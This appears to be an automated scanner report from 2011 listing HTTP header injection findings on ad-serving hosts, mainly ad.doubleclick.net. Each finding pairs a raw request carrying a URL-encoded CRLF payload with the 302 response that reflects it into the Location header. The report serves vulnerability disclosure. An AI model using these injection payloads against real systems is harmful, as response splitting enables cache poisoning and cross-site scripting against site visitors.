1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]
1.2. http://ad.doubleclick.net/ad/N2724.UndertoneNetwork/B4504763.26 [REST URL parameter 1]
1.3. http://ad.doubleclick.net/ad/N3867.ContextWeb/B5127624.18 [REST URL parameter 1]
1.4. http://ad.doubleclick.net/ad/N6457.4298.ADVERTISING.COM/B4840137.15 [REST URL parameter 1]
1.5. http://ad.doubleclick.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]
1.6. http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7 [REST URL parameter 1]
1.7. http://ad.doubleclick.net/adi/N2724.Specific_Media/B4323655.35 [REST URL parameter 1]
1.8. http://ad.doubleclick.net/adi/N3285.usatoday/B2343920.27 [REST URL parameter 1]
1.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]
1.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]
1.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]
1.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]
1.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]
1.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]
1.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]
1.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]
1.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]
1.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]
1.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]
1.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]
1.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]
1.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]
1.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]
1.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]
1.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]
1.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]
1.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1]
1.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1]
1.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1]
1.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1]
1.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1]
1.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1]
1.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter]
1.37. http://bidder.mathtag.com/notify [exch parameter]
1.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
1.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
1.40. http://c7.zedo.com/utils/ecSet.js [v parameter]
1.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]
1.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]
1.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
1.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]
1.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]
1.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]
1.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]
1.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]
1.49. http://w55c.net/m.gif [rurl parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /activity |
GET /5c9c1%0d%0a579cb4ff136;dc_pixel_url=resn Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5c9c1 579cb4ff136;dc_pixel_url=resn Date: Mon, 14 Feb 2011 01:37:44 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N2724.UndertoneN |
GET /1e8e4%0d%0a2fefa587c7c/N2724.UndertoneNetwork Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.dailymail.co Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1e8e4 2fefa587c7c/N2724.UndertoneNetwork Date: Mon, 14 Feb 2011 01:38:05 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N3867.ContextWeb |
GET /7d3d7%0d%0acda025163d8/N3867.ContextWeb Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://syndicated Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7d3d7 cda025163d8/N3867.ContextWeb Date: Mon, 14 Feb 2011 01:40:09 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N6457.4298.ADVER |
GET /2ef38%0d%0a0fd2405f6d4/N6457.4298.ADVERTISING Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2ef38 0fd2405f6d4/N6457.4298.ADVERTISING Date: Mon, 14 Feb 2011 01:40:24 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/cm.dailymail/ron |
GET /49ace%0d%0a79cce659e85/cm.dailymail/ron_052010 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.dailymail.co Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/49ace 79cce659e85/cm.dailymail/ron_052010 Date: Mon, 14 Feb 2011 01:38:04 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N1558.Media6 |
GET /547d9%0d%0aaddfa21ea08/N1558.Media6/B3897970.7 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.media6degrees Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/547d9 addfa21ea08/N1558.Media6/B3897970.7 Date: Mon, 14 Feb 2011 01:36:43 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N2724.Specific_Media |
GET /8c5f7%0d%0a4e3b8886cbe/N2724.Specific_Media Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.specificmedia Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8c5f7 4e3b8886cbe/N2724.Specific_Media Date: Mon, 14 Feb 2011 01:34:16 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.usatoday |
GET /15b01%0d%0a972348252b4/N3285.usatoday/B2343920 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://blogs.desmoin Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/15b01 972348252b4/N3285.usatoday/B2343920 Date: Mon, 14 Feb 2011 01:36:20 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3740.270604.B3 |
GET /8d6f8%0d%0a603205b847e/N3740.270604.B3/B5123509 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://a.rfihub.com/sed?w Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8d6f8 603205b847e/N3740.270604.B3/B5123509 Date: Mon, 14 Feb 2011 01:36:09 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4270.Media6Degrees |
GET /66666%0d%0abd96a1a83dd/N4270.Media6Degrees.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.media6degrees Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/66666 bd96a1a83dd/N4270.Media6Degrees.com Date: Mon, 14 Feb 2011 02:17:02 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4270.Tribal_Fusion |
GET /1321c%0d%0a3e041b3a832/N4270.Tribal_Fusion Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1321c 3e041b3a832/N4270.Tribal_Fusion Date: Mon, 14 Feb 2011 03:01:54 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4319.msn/B2087123 |
GET /72502%0d%0a12671d1359d/N4319.msn/B2087123.383 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/72502 12671d1359d/N4319.msn/B2087123.383 Date: Mon, 14 Feb 2011 01:52:24 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5367.3630 |
GET /8504a%0d%0adf688c05841/N5367.3630.247REALM Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8504a df688c05841/N5367.3630.247REALM Date: Mon, 14 Feb 2011 02:47:01 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/interactive.wsj.com |
GET /18c9f%0d%0a0be64f77a4b/interactive.wsj.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/18c9f 0be64f77a4b/interactive.wsj.com Date: Mon, 14 Feb 2011 01:36:58 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/interactive.wsj.com |
GET /676f7%0d%0a0fa438a5db8/interactive.wsj.com Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/676f7 0fa438a5db8/interactive.wsj.com Date: Mon, 14 Feb 2011 01:37:05 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3340.trfu/B4677841 |
GET /8da73%0d%0ae56ac07066f/N3340.trfu/B4677841.11 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://adserver.adtechus Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8da73 e56ac07066f/N3340.trfu/B4677841.11 Date: Mon, 14 Feb 2011 02:10:44 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3340.trfu/B4677841 |
GET /353a8%0d%0a75a8fe84543/N3340.trfu/B4677841.16 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/353a8 75a8fe84543/N3340.trfu/B4677841.16 Date: Mon, 14 Feb 2011 02:49:58 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3340.trfu/B4677841 |
GET /7a3a9%0d%0ae709d62e175/N3340.trfu/B4677841.2;sz Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://adserver.adtechus Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7a3a9 e709d62e175/N3340.trfu/B4677841.2;sz Date: Mon, 14 Feb 2011 02:34:54 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N3340.trfu/B4677841 |
GET /41285%0d%0a1e6e4985043/N3340.trfu/B4677841.38 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://adserver.adtechus Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/41285 1e6e4985043/N3340.trfu/B4677841.38 Date: Mon, 14 Feb 2011 02:40:56 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N4233.RSI/B4932906.5 |
GET /2b8f1%0d%0a4fde4d2ea46/N4233.RSI/B4932906.5;sz Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://blogs.desmoin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2b8f1 4fde4d2ea46/N4233.RSI/B4932906.5;sz Date: Mon, 14 Feb 2011 01:38:16 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5506.150800 |
GET /4dc34%0d%0aa5e50b6234/N5506.150800.314458 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4dc34 a5e50b6234/N5506.150800.314458 Date: Mon, 14 Feb 2011 01:44:39 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5506.aol1/B5070033 |
GET /21598%0d%0adfea6d161cc/N5506.aol1/B5070033.19 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/21598 dfea6d161cc/N5506.aol1/B5070033.19 Date: Mon, 14 Feb 2011 01:26:53 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5506.aol1/B5070033 |
GET /6f51e%0d%0a50897e369b1/N5506.aol1/B5070033.20 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://uac.advertising Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6f51e 50897e369b1/N5506.aol1/B5070033.20 Date: Mon, 14 Feb 2011 01:37:19 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5506.aol1/B5070033 |
GET /4200e%0d%0a6f9caf0b583/N5506.aol1/B5070033.21 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://adserver.adtechus Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4200e 6f9caf0b583/N5506.aol1/B5070033.21 Date: Mon, 14 Feb 2011 01:40:28 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5798.133090 |
GET /3d0ee%0d%0a9315563214f/N5798.133090.821294 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3d0ee 9315563214f/N5798.133090.821294 Date: Mon, 14 Feb 2011 02:14:33 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N6046.134363 |
GET /69142%0d%0a1bb7359b8ec/N6046.134363.204328 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/69142 1bb7359b8ec/N6046.134363.204328 Date: Mon, 14 Feb 2011 01:52:38 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N6092.AOL/B5108587.3 |
GET /9b799%0d%0abb53a367fe4/N6092.AOL/B5108587.3;sz Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://uac.advertising Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9b799 bb53a367fe4/N6092.AOL/B5108587.3;sz Date: Mon, 14 Feb 2011 01:41:22 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/cm.drudgerep/ |
GET /8e2dd%0d%0aaa7cb3ecbf6/cm.drudgerep/;net=cm;u= Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.drudgereport Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8e2dd aa7cb3ecbf6/cm.drudgerep/;net=cm;u= Date: Mon, 14 Feb 2011 02:10:51 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/drudgereport.ilm |
GET /697e6%0d%0a706ed09c5de/drudgereport.ilm/remnant Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://optimized-by Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c653243310000d9 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/697e6 706ed09c5de/drudgereport.ilm/remnant Date: Mon, 14 Feb 2011 01:52:33 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
